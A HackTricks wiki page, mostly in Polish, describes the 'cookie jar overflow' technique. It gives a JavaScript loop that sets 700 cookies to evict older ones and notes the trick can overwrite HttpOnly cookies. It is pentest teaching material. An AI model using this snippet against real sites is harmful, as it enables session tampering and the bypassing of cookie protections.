Cookie Jar Overflow

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Przeglądarki mają limit liczby ciasteczek, które mogą przechowywać dla danej strony. Jeśli z jakiegoś powodu musisz sprawić, by ciasteczko zniknęło, możesz przepełnić słoik z ciasteczkami, ponieważ najstarsze zostaną usunięte jako pierwsze:

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Zauważ, że ciasteczka stron trzecich wskazujące na inna domenę nie będą nadpisywane.

Ten atak może być również użyty do nadpisania ciasteczek HttpOnly, ponieważ możesz je usunąć, a następnie zresetować z wartością, którą chcesz.

Sprawdź to w tym poście z laboratorium.

Ucz się i ćwicz Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE) Ucz się i ćwicz Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Wsparcie dla HackTricks

Sprawdź plany subskrypcyjne!
Dołącz do 💬 grupy Discord lub grupy telegramowej lub śledź nas na Twitterze 🐦 @hacktricks_live.
Podziel się trikami hackingowymi, przesyłając PR-y do HackTricks i HackTricks Cloud repozytoriów github.

PreviousCookie Tossing NextCookie Bomb

Last updated 7 days ago